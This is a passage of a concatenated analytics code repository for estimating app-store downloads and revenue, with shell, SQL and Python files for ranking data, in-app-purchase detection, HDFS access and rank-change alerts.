weights="./cache/${country_id}_${category_id}_weigths.csv"
echo $downloads
echo $usd
cd $data_science_dir
python $aa_dir/estimation/ios/gen_rank_data.py -m $month -s $country_id -c $category_id
python $aa_dir/estimation/ios/curve_top.py -m $month -s $country_id
python $aa_dir/estimation/ios/curve_overall.py -m $month -s $country_id
#python $aa_dir/estimation/ios/curve_others.py -m $month -s $country_id -c $category_id
python $data_science_dir/run_fetch_and_concat.py -s $country_id -d $month -u Downloads,USD -x
python $data_science_dir/run_calculate_sda.py -d "$downloads" -u "$usd"
rm -f -r ./data_original
rm -f -r ./sda_original
mv -f ./data ./data_original
mv -f ./sda ./sda_original
python $aa_dir/estimation/ios/gen_rank_data.py -m $month -s $country_id -c $category_id -w "$weights"
python $aa_dir/estimation/ios/curve_top.py -m $month -s $country_id
python $aa_dir/estimation/ios/curve_overall.py -m $month -s $country_id
#python $aa_dir/estimation/ios/curve_others.py -m $month -s $country_id -c $category_id
python $data_science_dir/run_fetch_and_concat.py -s $country_id -d $month -u Downloads,USD -x
python $data_science_dir/unweight_estimates.py -e "$downloads" -w "$weights"
python $data_science_dir/unweight_estimates.py -e "$usd" -w "$weights"
python $data_science_dir/run_calculate_sda.py -d "$downloads" -u "$usd"
rm -f -r ./data_weighted
rm -f -r ./sda_weighted
mv -f ./data ./data_weighted
mv -f ./sda ./sda_weighted
<file_sep>/int-vs-m-benchmark/sql/ios/1000d1-prepare_application_data-inapp_details.sql
/*
FUNCTIONAL DESCRIPTION : Determines if an app has IAP.
DEPENDS ON TABLE(S) : temp.rankings_hourly, temp.rankings_daily, appstore.application_details
RESULTS IN TABLE(S) : temp.in_app
PROCEDURE : STEP 1. Start with checking the ('gross' and 'paid') hourly and daily rankings, if the maximal app price in this ranking is in (0,null) :- hasinapp > TRUE
STEP 2. We're missing the paid apps with price > 0, therefore check out the application_details for each app which in those rankings
- take a large period into account because application_dtails are not updated every day
- pick the most recent observation
STEP 3. An app has inapps if it has inapps in 1. or 2.
*/
-- STEP 1.
DROP TEMPORARY TABLE IF EXISTS temp.in_apps_from_all_rankings;
CREATE TEMPORARY TABLE temp.in_apps_from_all_rankings(
application_id int(10) unsigned NOT NULL,
has_inapps TINYINT unsigned DEFAULT NULL,
CONSTRAINT PRIMARY KEY (application_id)
)
AS
SELECT
r.application_id,
IF(MAX(IFNULL(r.price_usd,0)) = 0, 1, null) as has_inapps
FROM
temp.rankings r
WHERE
r.type in ('gross','paid')
GROUP BY
r.application_id
;
-- STEP 2.
-- iap from application_details:
DROP TEMPORARY TABLE IF EXISTS temp.application_details;
CREATE TEMPORARY TABLE temp.application_details(
application_id int(10) unsigned NOT NULL,
has_inapps TINYINT NOT NULL
)
AS
SELECT
application_id,
in_app_purchases AS has_inapps
FROM
(
SELECT
x.*,
IF(
(@prev=CONCAT('1','-',x.application_id)),
@rank:=@rank+1,
((@prev:=CONCAT('1','-',x.application_id)) AND (@rank:=1))
) AS modified_rank
FROM (
SELECT
a.application_id,
a.in_app_purchases
FROM appstore.application_details a
-- truncating the number of application that need to be considered
JOIN temp.in_apps_from_all_rankings r
ON r.application_id = a.application_id
WHERE
date BETWEEN DATE_ADD(LAST_DAY(DATE_SUB(@date, INTERVAL 3 MONTH)), INTERVAL 1 DAY)
AND DATE_ADD(@date, INTERVAL 1 DAY)
AND in_app_purchases IS NOT NULL
ORDER BY
application_id,
date DESC) x,
(SELECT @rank:=1, @prev:='') dummy
) buh
WHERE modified_rank = 1
;
-- STEP 3.
DROP TEMPORARY TABLE IF EXISTS temp.in_app;
CREATE TEMPORARY TABLE temp.in_app(
application_id int(10) unsigned NOT NULL,
has_inapps TINYINT NOT NULL,
CONSTRAINT PRIMARY KEY (application_id)
)
AS
SELECT
x.application_id,
MAX(x.has_inapps) AS has_inapps
FROM(
SELECT application_id, has_inapps FROM temp.application_details
UNION ALL
SELECT application_id, has_inapps FROM temp.in_apps_from_all_rankings WHERE has_inapps = 1
) x
GROUP BY
application_id
;
<file_sep>/aa_au_model/hive_scripts/workflow/module/hdfs.py
# Copyright (c) 2015 App Annie Inc. All rights reserved.
import subprocess
import os
import commands
class HDFSStorage(object):
@staticmethod
def read_dir(path):
p = os.path.join(path, '*')
cat = subprocess.Popen(["hadoop", "fs", "-cat", p], stdout=subprocess.PIPE)
return cat.stdout
@staticmethod
def make_dir(path):
s, o = commands.getstatusoutput('hadoop fs -mkdir %s' % path)
return True if s == 0 else False
@staticmethod
def read_file(file):
cat = subprocess.Popen(["hadoop", "fs", "-cat", file], stdout=subprocess.PIPE)
return cat.stdout
@staticmethod
def read_compressed_file(file):
cat = subprocess.Popen(["hadoop", "fs", "-text", file], stdout=subprocess.PIPE)
return cat.stdout
@staticmethod
def is_existed(path):
s, o = commands.getstatusoutput('hadoop fs -test -e %s' % path)
return True if s == 0 else False
@staticmethod
def delete(path, skip_trash=True):
skip_str = ''
if skip_trash:
skip_str = '-skipTrash'
status, output = commands.getstatusoutput('hadoop fs -rm -r -f %s %s' % (skip_str, path))
if status != 0:
raise Exception(output)
@staticmethod
def list(path):
s, o = commands.getstatusoutput('hadoop fs -ls %s | grep %s | awk \'{print $NF}\'' % (
path, path
))
return o.split('\n')
@staticmethod
def size(path):
s, o = commands.getstatusoutput(
'hadoop fs -du %s | awk \'BEGIN{s=0}{s+=$1}END{print s}\'' % path
)
return int(o.strip())
@staticmethod
def move(from_path, to_path):
s, o = commands.getstatusoutput('hadoop fs -mv %s %s' % (
from_path, to_path
))
if s != 0:
raise Exception(o)
@staticmethod
def copy(from_path, to_path):
s, o = commands.getstatusoutput('hadoop fs -cp %s %s' % (
from_path, to_path
))
if s != 0:
raise Exception(o)
@staticmethod
def touchz(file):
s, o = commands.getstatusoutput('hadoop fs -touchz %s' % file)
if s != 0:
raise Exception(o)
@staticmethod
def write(file, content):
HDFSStorage.delete(file)
p = subprocess.Popen(
['hadoop', 'fs', '-put', '-', file],
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT
)
p.communicate(input=content)<file_sep>/ranking_change/correlations_kpi.py
'''
Created on Aug 16, 2013
@author: perezrafael
'''
import pandas as pd
import matplotlib.pyplot as plt
import datetime as dt
import matplotlib.dates as mdates
import matplotlib.cm as cm
import config
def make_human_readable(df):
df['Country'] = df['store_id'].apply(lambda x: config.IOS_STORES_DICT[x])
del df['store_id']
df['Category'] = df['category_id'].apply(lambda x:config.IOS_CATEGORIES_DICT[x])
del df['category_id']
df['Type'] = df['feed_id'].apply(lambda x: config.IOS_TYPES_DICT[x])
df['Market'] = df['feed_id'].apply(lambda x: config.IOS_MARKETS_DICT[x])
del df['feed_id']
return df
def generate_kpi(df):
dfs = df.groupby(['store_id', 'category_id', 'feed_id', 'value_type', 'rank_limit'])
result = []
for n, g in dfs:
g = g.groupby('date').mean().reset_index()
g['prev_day_corr_rolling_avg'] = pd.stats.moments.rolling_mean(g['corr'].shift(),7)
g['corr_rolling_diff'] = g['corr'] - g['prev_day_corr_rolling_avg']
g['corr_alert'] = pd.stats.moments.rolling_mean(g['corr_rolling_diff'].shift(),7) + (pd.stats.moments.rolling_std(g['corr_rolling_diff'].shift(),7)*3.0)
g['store_id'] = n[0]
g['category_id'] = n[1]
g['feed_id'] = n[2]
g['value_type'] = n[3]
result.append(g)
result = pd.concat(result)
return result
def main():
fn = 'corr_2013-08-19'
df = pd.read_csv('data/corr/%s.csv'%fn)
df = df[df['rank_transform_name']=='log']
del df['rank_transform_name']
df = df[df['value_transform_name']=='log']
del df['value_transform_name']
kpi = generate_kpi(df)
kpi = make_human_readable(kpi)
kpi.to_csv('data/corr/%s_kpi.csv'%fn, index=False)
alerts = kpi[kpi['corr_rolling_diff'] > kpi['corr_alert']]
alerts.to_csv('data/corr/%s_alerts.csv'%fn, index=False)
if __name__ == '__main__':
main()<file_sep>/exact-matching-improvement/lib/feature_factory.py
__author__ = 'jjanssen'
import temp_database as td
from lib import features_aa
from lib import features_aa_improved
from lib import feature_company
cleaner = features_aa.Cleaner()
def aa_baseline_row(row):
name = row['app_name']
return cleaner.clean_app_name(name)
def generate_aa_baseline(market=None):
features = None
if market == 'android':
features = td.generate_android_features()
if market == 'ios':
features = td.generate_ios_features()
if market is None:
features = td.generate_all_features()
features['aa_baseline'] = features.apply(aa_baseline_row, axis=1).reset_index(drop=True)
return features.drop(labels='app_name', axis=1)
def generate_aa_improved(market=None):
features = None
if market == 'android':
features = td.generate_android_features()
if market == 'ios':
features = td.generate_ios_features()
if market is None:
features = td.generate_all_features()
features = features.apply(features_aa_improved.clean_appname_row, axis=1).reset_index(drop=True)
return features
def generate_aa_improved_v2(market=None):
features = None
if market == 'android':
features = td.generate_android_features()
if market == 'ios':
features = td.generate_ios_features()
if market is None:
features = td.generate_all_features()
features = features.apply(features_aa_improved.clean_appname_row_v2, axis=1).reset_index(drop=True)
return features
def generate_improved_unicode(market=None):
features = None
if market == 'android':
features = td.generate_android_features()
if market == 'ios':
features = td.generate_ios_features()
if market is None:
features = td.generate_all_features()
features = features.apply(features_aa_improved.clean_per_unicode_category, axis=1).reset_index(drop=True)
return features
def generate_cleaned_company(market=None):
features = None
if market == 'android':
features = td.generate_android_features()
if market == 'ios':
features = td.generate_ios_features()
if market is None:
features = td.generate_all_features()
features = features.apply(feature_company.clean_company, axis=1).reset_index(drop=True)
return features<file_sep>/tooling/DistimoClients/setup.py
from distutils.core import setup
setup(
name='DistimoClients',
version='1.0.0',
author='<NAME>',
author_email='<EMAIL>',
packages=['distimo_clients'],
description='Distimo MoneyMaker and Database clients',
install_requires=[
"numpy >= 1.8.0",
"pandas >= 0.14.0",
"paramiko >= 1.14.0",
"mysql-connector-python >= 1.2.2",
"naturalsort == 1.0.3",
"configparser >= 3.0.0"
],
)
<file_sep>/weekly_weights/apply_weights.py
'''
Created on May 29, 2013
@author: perezrafael
'''
import pandas as pd
import numpy as np
import os
from datetime import datetime
import sys
def load_estimates(path):
df = pd.DataFrame()
for (dirpath, dirnames, filenames) in os.walk(path):
for filename in filenames:
if filename.endswith('.csv'):
df = df.append(pd.read_csv(os.sep.join([dirpath, filename])))
return df
def load_ranks(path):
df = pd.DataFrame()
for (dirpath, dirnames, filenames) in os.walk(path):
for filename in filenames:
if filename.endswith('.csv'):
fdata = filename.split('_')
df1 = pd.read_csv(os.sep.join([dirpath, filename]))
df1['store_id'] = np.int64(fdata[0])
df = df.append(df1)
return df
def append_weekdays(df):
''' Check each weekday for each date and append it
'''
dates = df[['date']].drop_duplicates()
if isinstance(dates['date'][:1][0], str):
dates['date_b'] = dates['date'].apply(lambda x: datetime.strptime(x, '%Y-%m-%d'))
dates['weekday'] = dates['date_b'].apply(lambda x: x.weekday())
dates = dates.drop('date_b', axis=1)
else:
dates['weekday'] = dates['date'].apply(lambda x: x.weekday())
df = df.merge(dates, on='date')
return df
if __name__ == '__main__':
platform = 'android'
month = '2013-01'
#platform = sys.argv[1]
#month = sys.argv[2]
appannie_dir = '/Users/perezrafael/appannie'
preview_weights_path = '%s/data_science/weekly_weights/data/preview_weights_%s.csv'%(appannie_dir, platform)
dynamic_weights_path = '%s/data_science/weekly_weights/data/weights_%s_2012-12-30_2013-03-08.csv'%(appannie_dir, platform)
ranks_path = '%s/data_science/evaluation/data/%s/%s/est_daily_raw'%(appannie_dir, platform, month)
estimates_path = '%s/data/webui_estimates_b/%s/%s'%(appannie_dir, platform, month)
original_est_path = "%s/data_science/evaluation/data/%s_webui_original/%s/est_daily_raw"%(appannie_dir, platform, month)
preview_est_path = "%s/data_science/evaluation/data/%s_webui_preview/%s/est_daily_raw"%(appannie_dir, platform, month)
dynamic_est_path = "%s/data_science/evaluation/data/%s_webui_dynamic/%s/est_daily_raw"%(appannie_dir, platform, month)
unit = pd.DataFrame({'feed_id': [0,1,2,100,101,102],'unit':['downloads', 'downloads', 'usd', 'downloads', 'downloads', 'usd']})
dynamic_weights = pd.read_csv(dynamic_weights_path)[['unit', 'store_id', 'date', 'weight']].drop_duplicates()
preview_weights = pd.read_csv(preview_weights_path)[['unit', 'store_id', 'weekday', 'weight']].drop_duplicates()
ranks = load_ranks(ranks_path)[['store_id', 'category_id', 'rank', 'app_id', 'date', 'feed_id']].drop_duplicates()
#ranks = ranks[ranks['app_id']==529479190]
#ranks = ranks[ranks['category_id']==6014]
#ranks = ranks[ranks['feed_id']==102]
#ranks = ranks[ranks['store_id']==143441]
estimates = load_estimates(estimates_path)
if 'class' in estimates.columns:
estimates.rename(columns={'class':'app_id'}, inplace=True)
estimates = estimates.merge(ranks, on=['store_id', 'category_id', 'app_id', 'date', 'feed_id'])
ranks = None
estimates = estimates.merge(unit, on=['feed_id'])
estimates = estimates.merge(dynamic_weights, on=['unit', 'store_id', 'date'])
estimates['dynamic_estimate'] = estimates['estimate']*estimates['weight']
estimates = estimates.drop('weight', axis=1)
estimates = append_weekdays(estimates)
estimates = estimates.merge(preview_weights, on=['unit', 'store_id', 'weekday'])
estimates['preview_estimate'] = estimates['estimate']*estimates['weight']
estimates = estimates[['store_id', 'category_id', 'rank', 'app_id', 'estimate', 'date', 'feed_id', 'dynamic_estimate', 'preview_estimate']].drop_duplicates()
start_date = estimates['date'].min()
end_date = estimates['date'].max()
estimates = estimates.groupby(['store_id', 'feed_id'])
for n, g in estimates:
#143465_1_2013-02-01--2013-02-28.csv
filename = '%s_%s_%s--%s.csv'%(n[0], n[1], start_date, end_date)
g = g.drop('store_id', axis=1)
g[['category_id', 'rank', 'app_id', 'estimate', 'date', 'feed_id']].to_csv('%s/%s'%(original_est_path, filename),index=False)
g = g.drop('estimate', axis=1)
g.rename(columns={'dynamic_estimate':'estimate'}, inplace=True)
g[['category_id', 'rank', 'app_id', 'estimate', 'date', 'feed_id']].to_csv('%s/%s'%(dynamic_est_path, filename),index=False)
g = g.drop('estimate', axis=1)
g.rename(columns={'preview_estimate':'estimate'}, inplace=True)
g[['category_id', 'rank', 'app_id', 'estimate', 'date', 'feed_id']].to_csv('%s/%s'%(preview_est_path, filename),index=False)
print filename
<file_sep>/ranking_change/read_rank_files.py
'''
Created on Aug 14, 2013
@author: perezrafael
'''
import sys
import os
import pandas as pd
import zipfile
import StringIO
import matplotlib.pyplot as plt
import datetime as dt
import matplotlib.dates as mdates
import psycopg2
import matplotlib.cm as cm
import numpy as np
from itertools import cycle
import bz2
import datetime
import config
import gc
UNCOMPRESSED_RANKING_FILES_PATH = '/Users/perezrafael/appannie/data/ranks/special' if len(sys.argv) != 2 else sys.argv[1]
if not os.path.isdir(UNCOMPRESSED_RANKING_FILES_PATH):
print 'Expecting uncompressed ranking files in directory %s' % UNCOMPRESSED_RANKING_FILES_PATH
print 'You can specify it in sys.argv[1]'
sys.exit(2)
def load_ranks_csv_zip(path):
filehandle = open(path, 'rb')
zfile = zipfile.ZipFile(filehandle)
data = StringIO.StringIO(zfile.read(zfile.namelist()[0])) #don't forget this line!
df = pd.read_csv(data)
return df
def load_ranks_file(path, country_names=None, ranking_category_str_filter=None):
filename = os.path.split(path)[1]
assert filename.startswith('ranking_')
assert filename.endswith('.sql')
filename_date_str = filename[len('ranking_'):-len('.sql')]
filename_date = datetime.datetime.strptime(filename_date_str, '%Y-%m-%d').date()
ranking_market_str_filter = frozenset(map(str, config.IOS_MARKETS_DICT.keys()))
if ranking_category_str_filter is None:
ranking_category_str_filter = frozenset(map(str, config.IOS_CATEGORIES_DICT.keys()))
else:
ranking_category_str_filter = frozenset(ranking_category_str_filter)
if country_names is not None:
ranking_store_str_filter = []
for k, v in config.IOS_STORES_DICT.iteritems():
if v in country_names:
ranking_store_str_filter.append(str(k))
assert len(ranking_store_str_filter)
ranking_store_str_filter = frozenset(ranking_store_str_filter)
else:
ranking_store_str_filter = frozenset(map(str, config.IOS_STORES_DICT.keys()))
del country_names
f = open(path, 'r' )
dfs = []
for line in f:
assert line.startswith(filename_date_str)
line_split = line.split('\t')
ranking_date_str, ranking_store_str, ranking_category_str, ranking_market_str, ranking_list_str_unsplit = line_split
if ranking_store_str not in ranking_store_str_filter:
continue
if ranking_market_str not in ranking_market_str_filter:
continue
if ranking_category_str not in ranking_category_str_filter:
continue
country_name = ranking_store_str
category = ranking_category_str
market = ranking_market_str
assert ranking_list_str_unsplit.endswith('\n')
ranking_list_str_split = ranking_list_str_unsplit.rstrip().split(' ')
df = pd.DataFrame(ranking_list_str_split).reset_index()
df.rename(columns={0:'App ID', 'index':'Rank'}, inplace=True)
df['Rank'] += 1
df['Date'] = ranking_date_str
df['Country'] = country_name
df['Category'] = category
df['Market'] = market
dfs.append(df)
f.close()
dfs = pd.concat(dfs)
dfs['Category'] = dfs['Category'].apply(lambda ranking_category_str: config.IOS_CATEGORIES_DICT[int(ranking_category_str)])
dfs['Type'] = dfs['Market'].apply(lambda ranking_market_str: config.IOS_TYPES_DICT[int(ranking_market_str)])
dfs['Market'] = dfs['Market'].apply(lambda ranking_market_str: config.IOS_MARKETS_DICT[int(ranking_market_str)])
dfs['Country'] = dfs['Country'].apply(lambda ranking_store_str: config.IOS_STORES_DICT[int(ranking_store_str)])
return dfs
def daterange(start_date, end_date):
for n in range(int ((end_date - start_date).days)):
yield start_date + datetime.timedelta(n)
def add_f_date(df):
df2 = df[['Date']].drop_duplicates()
df2['f_date'] = [dt.datetime.strptime(d,'%Y-%m-%d').date() for d in df2['Date']]
df = df.merge(df2, on='Date')
return df
def plot_multi_category_rank_shift(df, which='rel', name='overall'):
gdf = df.groupby(['Country', 'Market', 'Type'])
for n,g in gdf:
plt.clf()
#fig = plt.figure()
fig = plt.figure(figsize=(int(len(g['Date'].drop_duplicates())/2),12))
ax = fig.add_subplot(111)
ax.set_position([0.1,0.1,0.5,0.8])
plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
plt.gca().xaxis.set_major_locator(mdates.DayLocator())
g = g.groupby(['Category', 'f_date']).mean().reset_index()
gdf2 = g.groupby(['Category'])
p = []
categories = []
lines = ["-","--","-.",":"]
linecycler = cycle(lines)
colors = iter(cm.rainbow(np.linspace(0, 1, len(gdf2))))
max_rank_shift = 0
for n2, g2 in gdf2:
pa, = plt.plot(g2['f_date'].values, g2['%s_rank_shift'%which], next(linecycler), linewidth=3, color=next(colors))
p.append(pa)
categories.append(n2)
if g2['%s_rank_shift'%which].max()>max_rank_shift:
max_rank_shift = g2['%s_rank_shift'%which].max()
plt.gcf().autofmt_xdate()
ax.grid()
if which=='rel':
plt.ylim(0,1)
elif which=='abs':
plt.ylim(0, max_rank_shift*1.1)
handles, labels = ax.get_legend_handles_labels()
lgd = ax.legend(p, categories, loc='center left', bbox_to_anchor=(1, 0.5))
plt.title(str(n))
fig.savefig('plots/rel_rank_change_all/%s_rank_change_%s_%s.png'%(which, name, '_'.join(n)), bbox_extra_artists=(lgd,), bbox_inches='tight')
#plt.show()
def plot_rank_shift(df, which='rel'):
gdf = df.groupby(['Country', 'Market', 'Type', 'Category'])
for n,g in gdf:
plt.clf()
#fig = plt.figure()
fig = plt.figure(figsize=(int(len(g['Date'].drop_duplicates())/2),6))
ax = fig.add_subplot(111)
plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
plt.gca().xaxis.set_major_locator(mdates.DayLocator())
g = g.groupby(['f_date']).mean().reset_index()
plt.plot(g['f_date'].values, g['%s_rank_shift'%which], linewidth=3, )
plt.gcf().autofmt_xdate()
ax.grid()
if which=='rel':
plt.ylim(0,1)
elif which=='abs':
plt.ylim(0, g['%s_rank_shift'%which].max()*1.1)
plt.title(str(n))
plt.savefig('plots/rel_rank_change/%s_rank_change_%s.png'%(which, '_'.join(n)))
#plt.show()
def get_rank_shift(df):
all_stats = []
dfs = df.groupby(['Country', 'Category', 'Market', 'Type'])
for n,g in dfs:
gdf2 = g.groupby('App ID')
rank_shifts=[]
for n2,g2 in gdf2:
g2['abs_rank_shift'] = (g2['Rank']-g2['Rank'].shift()).abs()
g2['rel_rank_shift'] = (g2['abs_rank_shift']*1.0)/g2['Rank'].shift()
rank_shifts.append(g2)
rank_shifts = pd.concat(rank_shifts)
all_stats.append(rank_shifts)
#rank_shifts.to_csv('%s.csv'%'_'.join(n), index=False)
all_stats = pd.concat(all_stats)
return all_stats
def plot_ranks(df, top=25):
dfs = df.groupby(['Country', 'Category', 'Market', 'Type'])
for n,g in dfs:
plt.clf()
fig = plt.figure()
fig = plt.figure(figsize=(40,12))
ax = fig.add_subplot(111)
plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
plt.gca().xaxis.set_major_locator(mdates.DayLocator())
gdf2 = g.groupby('App ID')
for n2,g2 in gdf2:
if g2['Rank'].quantile(0.75)<=20:
app_name = g2['App Name'].values[0]
plt.plot(g2['f_date'].values, g2['Rank'], '-')
plt.text(g2['f_date'].values.max(), g2[g2['f_date']==g2['f_date'].max()]['Rank'].max(), app_name)
plt.gcf().autofmt_xdate()
plt.gca().invert_yaxis()
ax.grid()
plt.ylim(top*2, 0)
plt.title(str(n))
plt.savefig('plots/top%s_%s.png'%(top, '_'.join(n)))
#plt.show()
def get_free_paid_ratio(df):
dfs = df.groupby(['Country', 'Category', 'Market', 'Type'])
def analyze_rank_shift(df, which='rel'):
dfs = df.groupby(['Country', 'Category', 'Market', 'Type'])
result = []
for n, g in dfs:
g = g.groupby('Date').mean().reset_index()
g['prev_day_%s_rank_shift_rolling_avg'%which] = pd.stats.moments.rolling_mean(g['%s_rank_shift'%which].shift(),7)
g['%s_rank_shift_rolling_diff'%which] = g['%s_rank_shift'%which] - g['prev_day_%s_rank_shift_rolling_avg'%which]
g['%s_rank_shift_alert'%which] = pd.stats.moments.rolling_mean(g['%s_rank_shift_rolling_diff'%which].shift(),7) + (pd.stats.moments.rolling_std(g['%s_rank_shift_rolling_diff'%which].shift(),7)*3.0)
g['Country'] = n[0]
g['Category'] = n[1]
g['Market'] = n[2]
g['Type'] = n[3]
result.append(g)
result = pd.concat(result)
return result
UNCOMPRESSED_RANKING_FILES_PATH = '/Users/perezrafael/appannie/data/ranks/special' if len(sys.argv) != 2 else sys.argv[1]
if not os.path.isdir(UNCOMPRESSED_RANKING_FILES_PATH):
print 'Expecting uncompressed ranking files in directory %s' % UNCOMPRESSED_RANKING_FILES_PATH
print 'You can specify it in sys.argv[1]'
sys.exit(2)
def main():
path = UNCOMPRESSED_RANKING_FILES_PATH
overall_categories = ['Overall',
'Games',
'Business',
'Weather',
'Utilities',
'Travel',
'Sports',
'Social Networking',
'Reference',
'Productivity',
'Photo and Video',
'News',
'Navigation',
'Music',
'Lifestyle',
'Health and Fitness',
'Finance',
'Entertainment',
'Education',
'Books',
'Medical',
'Newsstand',
'Food and Drink']
games_categories = ['Overall',
'Games',
'Action',
'Adventure',
'Arcade',
'Board',
'Card',
'Casino',
'Dice',
'Educational',
'Family',
'Kids',
'Music',
'Puzzle',
'Racing',
'Role Playing',
'Simulation',
'Sports',
'Strategy',
'Trivia',
'Word']
country_names = [#'United States',
#'United Kingdom',
#'Canada',
#'Japan',
#'China',
#'Russia',
#'Australia',
'Germany',
'France',
'Italy']
#country_names = ['Italy']
start_date = datetime.date(2013, 7, 1)
end_date = datetime.date(2013, 8, 13)
alerts= []
for country_name in country_names:
gc.collect()
dfs = []
print country_name
for single_date in daterange(start_date, end_date):
file = '%s/ranking_%s.sql'%(path, single_date.strftime('%Y-%m-%d'))
print 'loading %s'%file
df = load_ranks_file(file, [country_name])
dfs.append(df)
dfs = pd.concat(dfs)
dfs = add_f_date(dfs)
dfs = get_rank_shift(dfs)
dfs.to_csv('data/ranks/all_stats_%s.csv'%country_name, index=False)
stats = analyze_rank_shift(dfs)
stats.to_csv('data/ranks/%s_analysis.csv'%country_name, index=False)
alert = stats[stats['rel_rank_shift_rolling_diff'].abs()>stats['rel_rank_shift_alert']]
alert.to_csv('data/ranks/%s_rank_change_alerts.csv'%country_name, index=False)
alerts.append(alert)
#plot_rank_shift(dfs, 'rel')
plot_multi_category_rank_shift(dfs[dfs['Category'].isin(overall_categories)],'rel', 'overall')
plot_multi_category_rank_shift(dfs[dfs['Category'].isin(games_categories)],'rel', 'games')
alerts = pd.concat(alerts)
alerts.to_csv('data/all_rank_change_alerts.csv', index=False)
if __name__ == '__main__':
main()
<file_sep>/ranking_change/test_scales.py
'''
Created on Aug 27, 2013
@author: perezrafael
'''
import pandas as pd
import numpy as np
def get_business_model_correlation(df):
r = None
first_pass = True
for n, g in df.groupby(['business_model']):
business_model = n
g = g.rename(columns={'scale':business_model})
del g['business_model']
if first_pass:
r = g.copy()
else:
r = r.merge(g, on=['Country', 'Category' , 'Market', 'Type', 'rank_range', 'Date'], how='outer')
first_pass = False
r = r.fillna(1.0)
business_models = df['business_model'].drop_duplicates()
#for n1 in business_models:
# for n2 in business_models:
# if n1==n2:
# continue
# r['diff_%s_%s'%(n1,n2)] = (r[n1] - r[n2]).abs()
r.corr().to_csv('data/scales/scales_corr.csv', index=False)
r['diff Freemium + Subs -- Freemium'] = (r['Freemium + Subs'] - r['Freemium']).abs()
r['diff Paymium + Subs -- Paymium'] = (r['Paymium + Subs'] - r['Paymium']).abs()
r = r.sort(['Country', 'Category' , 'Market', 'Type', 'rank_range'], ascending=True)
r.to_csv('data/scales/scales_diff.csv', index=False)
def get_business_model_autocorr(df):
r = []
df = df.sort(['Country', 'Category' , 'Market', 'Type', 'rank_range', 'Date'], ascending=True)
for n, g in df.groupby(['Country', 'Category' , 'Market', 'Type', 'rank_range','business_model']):
shift = []
corr = []
business_model = n[5]
for i in np.arange(g.shape[0]):
shift.append(i)
corr.append(g['scale'].corr(g['scale'].shift(i)))
g['shift'] = shift
g['corr'] = corr
r.append(g)
r = pd.concat(r)
r = r[['Country', 'Category' , 'Market', 'Type', 'rank_range','business_model', 'shift', 'corr']].drop_duplicates()
r.to_csv('data/scales/scales_autocorr.csv', index=False)
def main():
file = 'data/scales/scales.csv'
df = pd.read_csv(file)
df = df[df['Date']>'2013-08-08']
#get_business_model_correlation(df)
get_business_model_autocorr(df)
if __name__ == '__main__':
main()<file_sep>/evaluation/py/log_to_csv.py
"""
Collect the quality measure results into pandas DataFrame, and output to CSV.
An example of log file:
143441_Downloads_2012-07-01--2012-07-31.csv
--------
(Top 200) % of analytics apps over 20% error: 0.305000
(Top 200) % of analytics apps over 10% and 100.00 units error: 0.550000
143441_USD_2012-07-01--2012-07-31.csv
--------
(Top 200) % of analytics apps over 20% error: 0.230000
(Top 200) % of analytics apps over 10% and 100.00 units error: 0.525000
"""
# Author: <NAME> <<EMAIL>>
import sys
import os.path
import itertools
import re
import pandas as pd
import operator
from optparse import OptionParser
from internal import stores_dict
def main():
opts, args = parse_options()
log_filename = args[0]
output_csv = args[1]
f = file(log_filename, 'r')
lines = f.readlines()
# Groups are separated by empty lines.
groupby = itertools.groupby(lines, lambda s: s != '\n')
groups = [list(g[1]) for g in groupby if g[0]]
platform = opts.platform.split('_')[0].lower()
pairs = map(lambda g: _generate_name_and_series_pair_from_group(g, platform), groups)
# The pairs are: [(name1, pd.Series), (name2, pd.Series), ...]
df = pd.DataFrame.from_items(pairs)
df.T.to_csv(output_csv, index=False)
def parse_options():
parser = OptionParser()
parser.add_option("-p", "--platform", dest="platform",
help="Required. The platform you want to get.")
(opts, args) = parser.parse_args()
try:
return (opts, args)
except Exception:
print(parser.print_help())
def _generate_name_and_series_pair_from_group(g, platform):
name = g[0].strip()
content = g[2:]
content_series = _content_to_series(content)
return (name, _add_meta_info(content_series, name, platform))
def _content_to_series(s):
"""['xxx: num1'
'yyy: num2'
...]
->
pd.Series with index=[xxx, yyy, ...] and values=[num1, num2, ...]
"""
pattern = re.compile(r'(.*): (.*)')
index = []
values = []
def collect_index_and_values(s):
m = pattern.match(s.strip())
key = m.group(1)
value = m.group(2)
index.append(key)
values.append(value)
map(collect_index_and_values, s)
return pd.Series(values, index=index)
def _add_meta_info(s, name, platform):
country, unit, period = name.split('_')
country_dict = eval('stores_dict.%s[\'country_dict\']' % platform)
country = country_dict[int(country)]
os.path.basename
s = s.append(pd.Series([country], index=['country']))
s = s.append(pd.Series([unit], index=['unit']))
s = s.append(pd.Series([period.split('.')[0]], index=['period']))
return s
if __name__ == '__main__':
main()
<file_sep>/customers-also-bought/lib/customer_scrapers/customer_scrapers/items.py
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class CustomerScrapersItem(scrapy.Item):
# define the fields for your item here like:
# name = scrapy.Field()
country_external_id = scrapy.Field()
external_id = scrapy.Field()
price = scrapy.Field()
genre_names = scrapy.Field()
cab_external_id = scrapy.Field()
cab_rank = scrapy.Field()
app_name = scrapy.Field()
has_in_app_purchases = scrapy.Field()
<file_sep>/int-vs-m-benchmark/sql/ios/1000a5-initialize-settings_tables.sql
/*
DESCRIPTION : create working tables
INPUT TABLE(S) : generic.exchange_rates, generic.currencies,
appstore.currencies, appstore.countries, appstore.applications
appstore.appstore_instances, appstore.rankcategories, appstore.categories
INTERIM TABLE(S) : n/a
OUTPUT TABLE(S) : temp.settings_countries
temp.settings_excluded_apps
temp.settings_day_weights
temp.settings_exchange_rates
temp.settings_appstore_instances
temp.settings_rankcategories
QUERY STEPS : 1. create temporary tables for countries, day weights, exchange rates, appstore_instances, rankcategories rankings
*/
-- COUNTRIES --
SET @countries = REPLACE(TRIM(REPLACE(REPLACE(UPPER(@countries),' ',''),',',' ')),' ',',');
CALL generic_string_list_to_table_$process_id(@countries,'temp.countries_temp','VARCHAR(6)');
DROP TEMPORARY TABLE IF EXISTS temp.settings_countries;
CREATE TEMPORARY TABLE temp.settings_countries (
iso_code VARCHAR(2),
country_id smallint(5) unsigned NOT NULL,
CONSTRAINT PRIMARY KEY (iso_code))
AS
